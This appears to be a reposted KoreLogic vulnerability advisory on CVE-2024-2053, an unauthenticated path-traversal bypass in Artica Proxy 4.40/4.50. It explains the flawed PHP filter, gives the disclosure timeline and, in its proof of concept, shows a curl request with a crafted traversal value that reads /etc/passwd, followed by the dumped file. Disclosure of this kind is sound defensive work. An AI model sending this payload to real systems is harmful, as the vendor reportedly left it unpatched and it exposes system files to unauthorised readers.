exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Artica Proxy 4.40 / 4.50 Local File Inclusion / Traversal

Artica Proxy 4.40 / 4.50 Local File Inclusion / Traversal
Posted Mar 6, 2024
Authored by Jaggar Henry | Site korelogic.com

Artica Proxy versions 4.40 and 4.50 suffer from a local file inclusion protection bypass vulnerability that allows for path traversal.

tags | exploit, local, bypass, file inclusion
advisories | CVE-2024-2053
SHA-256 | ee5d3d2cce629647f1cc48769c74910aca7883ad99b79b7b1c766a0e28a65ddf

Artica Proxy 4.40 / 4.50 Local File Inclusion / Traversal

Change Mirror Download
KL-001-2024-001: Artica Proxy Unauthenticated LFI Protection Bypass Vulnerability

Title: Artica Proxy Unauthenticated LFI Protection Bypass Vulnerability
Advisory ID: KL-001-2024-001
Publication Date: 2024.03.05
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-001.txt


1. Vulnerability Details

Affected Vendor: Artica
Affected Product: Artica Proxy
Affected Version: 4.40 and 4.50
Platform: Debian 10 LTS
CWE Classification: CWE-23: Relative Path Traversal
CVE ID: CVE-2024-2053


2. Vulnerability Description

The Artica Proxy administrative web application attempts to
prevent local file inclusion. These protections can be bypassed
and arbitrary file requests supplied by unauthenticated
users will be returned according to the privileges of the
"www-data" user.


3. Technical Description

Prior to authentication, a user can send an HTTP request to
the "images.listener.php" endpoint. This endpoint processes
the "mailattach" query parameter and concatonates the user
supplied value to the "/opt/artica/share/www/attachments/"
file path. The contents of the file located at the newly
created path is returned in the HTTP response body.

The "images.listener.php" endpoint attempts to prevent
a local file inclusion vulnerability by stripping strings
that attempt to traverse into the parent directory from
the user supplied "mailattach" value:

$_GET["mailattach"]=str_replace("////","/",$_GET["mailattach"]);
$_GET["mailattach"]=str_replace("///","/",$_GET["mailattach"]);
$_GET["mailattach"]=str_replace("//","/",$_GET["mailattach"]);
$_GET["mailattach"]=str_replace("../","",$_GET["mailattach"]);
$_GET["mailattach"]=str_replace("/etc/","",$_GET["mailattach"]);
$_GET["mailattach"]=str_replace("passwd","",$_GET["mailattach"]);
$file="/opt/artica/share/www/attachments/{$_GET["mailattach"]}";
header("Content-type: application/force-download" );
header("Content-Disposition: attachment; \
filename=\"{$_GET["mailattach"]}\"");
header("Content-Length: ".filesize($file)."" );
header("Expires: 0" );
readfile($file);

If effective, this approach would limit files
accessible by this endpoint to those within the
"/opt/artica/share/www/attachments/" directory. Unfortunately,
the removal of the "../" string is only performed once, so
the resulting file path is not checked. By using the path
"..././foo.txt", the "images.listener.php" endpoint removes the
"../" string resulting in "../foo.txt" - a relative file path
to traverse to the parent directory.

The strings "/etc/" and "passwd" are also stripped from the file
path as many methods of detecting a path traversal vulnerability
rely on fetching the "/etc/passwd" file. By inserting these
strings into specific locations, a user suppplied "mailattach"
value such as "/epasswdtc/ppasswdasswd" is transformed into
"/etc/passwd", bypassing the protection entirely.

An unauthenticated user can leverage this endpoint to read
files on the system, according to the privileges of the
"www-data" user.


4. Mitigation and Remediation Recommendation

No response from vendor; no remediation available.


5. Credit

This vulnerability was discovered by Jaggar Henry of KoreLogic,
Inc.


6. Disclosure Timeline

2023.12.18 - KoreLogic requests vulnerability contact and
secure communication method from Artica.
2023.12.18 - Artica Support issues automated ticket #1703011342
promising follow-up from a human.
2024.01.10 - KoreLogic again requests vulnerability contact and
secure communication method from Artica.
2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from
mail.articatech.com with response
"Client host rejected: Go Away!"
2024.01.11 - KoreLogic requests vulnerability contact and
secure communication method via
https://www.articatech.com/ 'Contact Us' web form.
2024.01.23 - KoreLogic requests CVE from MITRE.
2024.01.23 - MITRE issues automated ticket #1591692 promising
follow-up from a human.
2024.02.01 - 30 business days have elapsed since KoreLogic
attempted to contact the vendor.
2024.02.06 - KoreLogic requests update on CVE from MITRE.
2024.02.15 - KoreLogic requests update on CVE from MITRE.
2024.02.22 - KoreLogic reaches out to alternate CNA for
CVE identifiers.
2024.02.26 - 45 business days have elapsed since KoreLogic
attempted to contact the vendor.
2024.02.29 - Vulnerability details presented to AHA!
(takeonme.org) by proxy.
2024.03.01 - AHA! issues CVE-2024-2053 to track this
vulnerability.
2024.03.05 - KoreLogic public disclosure.


7. Proof of Concept

$ curl -k
'https://192.168.2.129:9000/images.listener.php?uri=1&mailattach=..././..././..././..././..././epasswdtc/ppasswdasswd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
mysql:x:105:112:MySQL Server,,,:/nonexistent:/bin/false
quagga:x:106:114:Quagga routing suite,,,:/run/quagga/:/usr/sbin/nologin
apt-mirror:x:107:115::/var/spool/apt-mirror:/bin/sh
privoxy:x:108:65534::/etc/privoxy:/usr/sbin/nologin
ntp:x:109:117::/nonexistent:/usr/sbin/nologin
redsocks:x:110:118::/var/run/redsocks:/usr/sbin/nologin
prads:x:111:120::/home/prads:/usr/sbin/nologin
freerad:x:112:121::/etc/freeradius:/usr/sbin/nologin
vnstat:x:113:122:vnstat daemon,,,:/var/lib/vnstat:/usr/sbin/nologin
stunnel4:x:114:123::/var/run/stunnel4:/usr/sbin/nologin
sshd:x:115:65534::/run/sshd:/usr/sbin/nologin
vde2-net:x:116:124::/var/run/vde2:/usr/sbin/nologin
memcache:x:117:125:Memcached,,,:/nonexistent:/bin/false
davfs2:x:118:126::/var/cache/davfs2:/usr/sbin/nologin
ziproxy:x:119:127::/var/run/ziproxy:/usr/sbin/nologin
proftpd:x:120:65534::/run/proftpd:/usr/sbin/nologin
ftp:x:121:65534::/srv/ftp:/usr/sbin/nologin
mosquitto:x:122:128::/var/lib/mosquitto:/usr/sbin/nologin
openldap:x:123:129:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false
munin:x:124:130:munin application user,,,:/var/lib/munin:/usr/sbin/nologin
msmtp:x:125:131::/var/lib/msmtp:/usr/sbin/nologin
Debian-snmp:x:126:132::/var/lib/snmp:/bin/false
opendkim:x:127:133::/var/run/opendkim:/usr/sbin/nologin
avahi:x:128:134:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
glances:x:129:135::/var/lib/glances:/usr/sbin/nologin
ArticaStats:x:1000:1000:ArticaStats:/home/ArticaStats:/bin/bash
Debian-exim:x:130:138::/var/spool/exim4:/usr/sbin/nologin
smokeping:x:131:139:SmokePing daemon,,,:/var/lib/smokeping:/usr/sbin/nologin
debian-spamd:x:132:140::/var/lib/spamassassin:/bin/sh
netdata:x:1001:1002:netdata:/home/netdata:/bin/bash
postfix:x:1002:1001::/home/postfix:/bin/sh
...
...


The contents of this advisory are copyright(c) 2024
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close